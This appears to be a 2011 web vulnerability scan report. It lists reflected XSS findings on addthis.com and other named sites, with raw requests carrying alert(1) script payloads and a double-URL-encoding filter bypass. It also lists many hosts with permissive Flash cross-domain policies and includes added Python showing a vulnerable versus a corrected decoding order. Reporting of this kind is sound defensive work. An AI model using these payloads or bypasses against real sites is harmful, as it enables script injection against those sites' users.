Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7e58f"><script>alert(1)</script>ec94702f118
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:27:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96631
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4664%2522%253balert%25281%2529%252f%252fc4f26dbd9fc was submitted in the Referer HTTP header. This input was echoed as a4664";alert(1)//c4f26dbd9fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character. The echoed value shows that the application decodes the header twice: %2522 becomes %22 and then a double quotation mark, after the character check has already run.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. For this instance, however, the payload consists only of letters, digits and percent signs, which a browser transmits verbatim in a Referer header, so the attacker does not need to set the header directly: it is enough to host a page whose URL contains the payload and have the victim follow a link from it to /bookmark.php. Whether the full URL is sent is governed by the referring page's referrer policy, which the attacker controls (unsafe-url sends the complete URL even cross-origin). The header-based limitation therefore mitigates this instance far less than it does the one above.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is no need to URL-decode the value of the Referer HTTP header at all, let alone twice: web servers pass request headers to the application verbatim (only the request path is decoded for routing), so the %2522 seen in the request reached the application unchanged and was turned into a quotation mark by the application's own decoding. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that a check for dangerous characters sees the same value that is inserted into the page.
Request
GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a4664%2522%253balert%25281%2529%252f%252fc4f26dbd9fc
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:27:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96589
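The double-URL-encoding bypass in this instance comes down to an order-of-operations bug: the character check runs on the raw header, and the decoding runs afterwards. The following is an added example, not addthis.com's code, that reproduces that ordering beside the corrected one. The report does not show the site's actual filter, so the blocklist here is an assumed stand-in; the two referer strings are constructed from the request above and a benign search URL.

```python
"""Added example (not the addthis.com code): the order-of-operations bug behind
the double-URL-encoding bypass, next to the corrected order.

The request shows a4664%2522%253balert%25281%2529%252f%252fc4f26dbd9fc being
echoed as a4664";alert(1)//c4f26dbd9fc, i.e. decoded twice after a character
check that only ever saw percent signs. The blocklist below stands in for
whatever filter the site uses, which the report does not show.
"""
from typing import Optional
from urllib.parse import unquote

# Characters the (assumed) filter refuses; the site's real list is not shown.
BLOCKED = set("\"'<>")


def passes_blocklist(value: str) -> bool:
    return not (BLOCKED & set(value))


def vulnerable_pipeline(referer: str) -> Optional[str]:
    """Check first, decode afterwards (twice). Returns the echoed value, or
    None if the filter rejected the input."""
    if not passes_blocklist(referer):
        return None
    return unquote(unquote(referer))


def canonicalise(value: str, max_rounds: int = 3) -> str:
    """URL-decode until the value stops changing, with a bound so that deeply
    nested encodings are rejected rather than silently accepted."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("excessively nested URL encoding")


def hardened_pipeline(referer: str) -> Optional[str]:
    """Canonicalise first, validate the canonical form, and use only that
    form afterwards, so the check sees exactly what reaches the page."""
    try:
        canonical = canonicalise(referer)
    except ValueError:
        return None
    if not passes_blocklist(canonical):
        return None
    return canonical


# Constructed inputs: the report's payload and a benign referer.
ATTACK = "http://www.google.com/search?hl=en&q=a4664%2522%253balert%25281%2529%252f%252fc4f26dbd9fc"
BENIGN = "http://www.google.com/search?hl=en&q=flash%20policy"

if __name__ == "__main__":
    for label, value in (("attack", ATTACK), ("benign", BENIGN)):
        print(label, "vulnerable:", vulnerable_pipeline(value))
        print(label, "hardened:  ", hardened_pipeline(value))
```

Note that the fix is the ordering, not a better blocklist: a filter that runs before the last decode can always be bypassed by one more layer of encoding, and output encoding for the JavaScript string sink is still required for whatever the validated value contains.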
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload a8199<script>alert(1)</script>9d3863d50ae was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a8199<script>alert(1)</script>9d3863d50ae
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:27:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96613
The value of the JSESSIONID cookie is copied into the HTML document as plain text between tags. The payload 416eb<script>alert(1)</script>ad99e449219 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability, for example a script-injection flaw on another host under the same parent domain (which can set a cookie scoped to that parent domain), a header-injection flaw that lets an attacker add a Set-Cookie header, or an active network attacker who can serve a plain-HTTP response for the domain. This limitation considerably mitigates the impact of the vulnerability. Note also that the response body shown below is JSON; whether a browser would render the injected script element at all depends on the response's Content-Type header, which is not included here, so confirm that before rating this instance.
{"token":"99A6B622412B24DBC05018F5AF4B46BC.bau10416eb<script>alert(1)</script>ad99e4492191304374524694","tlcs":[{"tlc":"26969","thumb":"/autostrade/FrameTelecamera?tipo=T&tlc=26969","description":"A1 Diramazione Roma nord - GRA Km. 09,9 Castelnuovo di Porto"},{"tlc":"38914","thumb":"/autos ...[SNIP]...
The value of the ultimeTrePagine cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60622'-alert(1)-'66d057b537f was submitted in the ultimeTrePagine cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ultimeTrePagine cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cad1b'-alert(1)-'d7d638a9938 was submitted in the ultimeTrePagine cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains. In practice: remove allow-access-from domain="*" from any host that serves authenticated or otherwise non-public content, avoid wildcards that match hosts you do not control, do not set secure="false" on a policy served over HTTPS, and use a site-control element with permitted-cross-domain-policies="master-only" (or "none") so that policy files elsewhere on the host cannot widen the master policy. Flash Player reached end of life at the end of 2020 and current browsers no longer run it, which confines the practical exposure from these findings to legacy clients; a stale permissive policy is nevertheless cheap to remove.
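The findings that follow classify each policy by the kind of allow-access-from entries it contains. The following is an added example, not part of the report or of any vendor tool, that performs the same classification offline and additionally flags secure="false" on an HTTPS-served policy and wildcard header permissions. The two sample policies are constructed from fragments visible later in this report; the site-control line is an assumption, since the report elides that element.

```python
"""Added example (not part of the report or any vendor tool): classify the
allow-access-from entries of a crossdomain.xml the same way the findings that
follow do ("any domain", "wildcard", "specific domains") and flag
secure="false" where it matters. The two sample policies are constructed from
fragments visible in this report; the site-control line is an assumption.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List

POLICY_OPEN = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="*" secure="false"/>
</cross-domain-policy>
"""

POLICY_SCOPED = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-http-request-headers-from domain="*.bing.com" headers="*"/>
  <allow-access-from domain="*.bing.com"/>
  <allow-access-from domain="blstc.msn.com"/>
  <allow-access-from domain="stc.sandblu.msn-int.com"/>
</cross-domain-policy>
"""


def classify_domain(domain: str) -> str:
    """'any' for a bare *, 'wildcard' for patterns such as *.example.com,
    otherwise 'specific'."""
    domain = domain.strip()
    if domain == "*":
        return "any"
    if "*" in domain:
        return "wildcard"
    return "specific"


def audit_policy(xml_text: str, served_over_https: bool = False) -> Dict[str, List[str]]:
    """Parse a policy and return the allowed domains grouped by class plus a
    list of human-readable findings in the report's wording."""
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        raise ValueError("not a cross-domain policy, root element is %r" % root.tag)
    result: Dict[str, List[str]] = {"any": [], "wildcard": [], "specific": [], "findings": []}
    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        result[classify_domain(domain)].append(domain)
        # secure="false" only widens exposure when the policy itself is served
        # over HTTPS: it then admits SWFs that were loaded over plain HTTP.
        if served_over_https and el.get("secure", "true").lower() == "false":
            result["findings"].append('secure="false" for domain %s on an HTTPS host' % domain)
    for el in root.iter("allow-http-request-headers-from"):
        if el.get("headers", "") == "*" and "*" in el.get("domain", ""):
            result["findings"].append("arbitrary request headers accepted from %s" % el.get("domain"))
    if result["any"]:
        result["findings"].append("allows access from any domain")
    if result["wildcard"]:
        result["findings"].append("uses a wildcard to specify allowed domains: " + ", ".join(result["wildcard"]))
    if result["specific"]:
        result["findings"].append("allows access from specific other domains: " + ", ".join(result["specific"]))
    return result


if __name__ == "__main__":
    for name, policy in (("open", POLICY_OPEN), ("scoped", POLICY_SCOPED)):
        for finding in audit_policy(policy, served_over_https=True)["findings"]:
            print("%s: %s" % (name, finding))
```

To run it against a live host, fetch /crossdomain.xml yourself and pass the body in, setting served_over_https according to the scheme you fetched it over; the parser deliberately does not fetch anything.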
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk. This policy also sets secure="false", which, where the policy is served over HTTPS, additionally permits Flash content loaded over plain HTTP to interact with the host.
Request
GET /crossdomain.xml HTTP/1.0
Host: ad-emea.doubleclick.net
Response
HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 18:22:36 GMT
Date: Mon, 02 May 2011 22:45:44 GMT
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site- ...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: ad78.neodatagroup.com
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:17:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
Last-Modified: Mon, 12 Oct 2009 10:53:26 GMT
ETag: "5d8989-c9-475babd3b7580"
Accept-Ranges: bytes
Content-Length: 201
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 22:17:39 GMT
Connection: close
Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: adlev.neodatagroup.com
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:21:47 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
Last-Modified: Mon, 12 Oct 2009 10:53:26 GMT
ETag: "5d8989-c9-475babd3b7580"
Accept-Ranges: bytes
Content-Length: 201
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 22:21:47 GMT
Connection: close
Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com
Response
HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 22:33:24 GMT
Connection: close
Content-Length: 100
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: cdn1.eyewonder.com
Response
HTTP/1.0 200 OK
Last-Modified: Fri, 07 Nov 2008 23:34:25 GMT
ETag: "4418f35e3141c91:139e"
Content-Length: 195
Content-Type: text/xml
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
p3p: policyref="/200125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
Cache-Control: max-age=2828
Expires: Mon, 02 May 2011 23:04:13 GMT
Date: Mon, 02 May 2011 22:17:05 GMT
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: cdn4.eyewonder.com
The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: documenti.camera.it
Response
HTTP/1.0 200 OK
Cache-Control: No-Cache
Pragma: No-Cache
Content-Length: 1225
Content-Type: text/xml
Last-Modified: Tue, 25 Jan 2011 14:36:58 GMT
Accept-Ranges: bytes
ETag: "371bff519dbccb1:16c7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 22:24:34 GMT
X-Cache: MISS from ns1.camera.it
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com
Response
HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 22:33:24 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: elstatic.weborama.fr
Response
HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/xml
Date: Mon, 02 May 2011 23:05:02 GMT
ETag: "1171997018"
Expires: Mon, 09 May 2011 23:05:02 GMT
Last-Modified: Thu, 13 Dec 2007 13:37:01 GMT
Server: ECAcc (dca/53CF)
X-Cache: HIT
Content-Length: 201
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: eprocurement.eni.it
Response
HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Last-Modified: Wed, 23 Mar 2011 10:31:45 GMT
Accept-Ranges: bytes
ETag: "1735e18145e9cb1:12e6"
Server: Microsoft-IIS/6.0
Date: Mon, 02 May 2011 22:24:14 GMT
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: ieo.solution.weborama.fr
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:04:57 GMT
Server: Apache
Last-Modified: Mon, 20 Oct 2008 13:27:23 GMT
ETag: "2a8005-6c-459af467404c0"
Accept-Ranges: bytes
Content-Length: 108
Connection: close
Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: metrics.ilsole24ore.com
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:17:43 GMT
Server: Omniture DC/2.0.0
xserver: www313
Connection: close
Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: mfr.247realmedia.com
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:16:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT
ETag: "3fd213-d0-4436057df0e40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_n1efm_qppm_iuuq=ffffffff09097b8445525d5f4f58455e445a4a423660;path=/;httponly
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: omniture.virgilio.it
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:16:17 GMT
Server: Omniture DC/2.0.0
xserver: www13
Connection: close
Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: paginebianche.ilsole24ore.com
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:28:05 GMT
Server: Apache
Set-Cookie: kpi=173.193.214.243.1304375285304156; path=/; expires=Thu, 29-Apr-21 22:28:05 GMT; domain=.ilsole24ore.com
Last-Modified: Wed, 18 Mar 2009 13:14:48 GMT
ETag: "670190-d6-4656477ce8200"
Accept-Ranges: bytes
Content-Length: 214
Connection: close
Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: paginegialle.ilsole24ore.com
Response
HTTP/1.0 200 OK
Server: Apache
P3P: CP='NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR SAMa BUS IND UNI COM NAV INT'
Last-Modified: Mon, 03 Jul 2006 07:55:31 GMT
ETag: "a7cb6a-2e8-44a8cd73"
Content-Type: text/xml
Date: Mon, 02 May 2011 22:26:38 GMT
Content-Length: 744
Connection: close
Set-Cookie: kpi=173.193.214.243.1304375198; expires=Sun, 02-May-2021 22:26:38 GMT; path=/; domain=paginegialle.it
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: secure-it.imrworldwide.com
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:17:42 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 09 May 2011 22:17:42 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com
Response
HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:943"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 22:18:46 GMT
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: video.ilsole24ore.com
Response
HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:04:50 GMT
Server: Apache/2.0.55 (Ubuntu) mod_jk/1.2.28 PHP/5.1.2
Last-Modified: Tue, 06 Oct 2009 15:51:05 GMT
ETag: "278a7e-13b-32a9ec40"
Accept-Ranges: bytes
Content-Length: 315
Connection: close
Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.luxury24.ilsole24ore.com
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:45:41 GMT
Server: Apache/2.0.46 (CentOS)
Last-Modified: Tue, 06 Oct 2009 15:51:22 GMT
ETag: "15aca3e-13b-33ad5280"
Accept-Ranges: bytes
Content-Length: 315
Connection: close
Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.motori24.ilsole24ore.com
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:18:17 GMT
Server: Apache/2.0.55 (Ubuntu) mod_jk/1.2.28 PHP/5.1.2
Last-Modified: Tue, 06 Oct 2009 15:51:33 GMT
ETag: "27dc38-13b-34552b40"
Accept-Ranges: bytes
Content-Length: 315
Connection: close
Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.yoox.com
Response
HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 03 Nov 2009 15:10:14 GMT
Accept-Ranges: bytes
ETag: "983995be975cca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
ORIGIN: Web14
Content-Length: 102
Date: Mon, 02 May 2011 22:45:40 GMT
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: zanox01.webtrekk.net
Response
HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Content-Length: 106
Date: Mon, 02 May 2011 22:21:14 GMT
Connection: close
Server: q3/4
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: adimg.alice.it
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:18:32 GMT
Server: Apache
Last-Modified: Wed, 30 Mar 2011 10:38:32 GMT
ETag: "59a-49fb0c73dd6d7"
Accept-Ranges: bytes
Content-Length: 1434
P3P: policyref="http://adv.alice.it/w3c/p3p.xml", CP=" NOI DSP COR NID"
Connection: close
Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: adv.ilsole24ore.it
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:15:14 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Last-Modified: Tue, 11 Jan 2011 17:00:30 GMT
ETag: "118003-132-4d2c8cae"
Accept-Ranges: bytes
Content-Length: 306
Connection: close
Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0
Host: answers.yahoo.com
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:23:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 17 Jun 2010 15:57:01 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
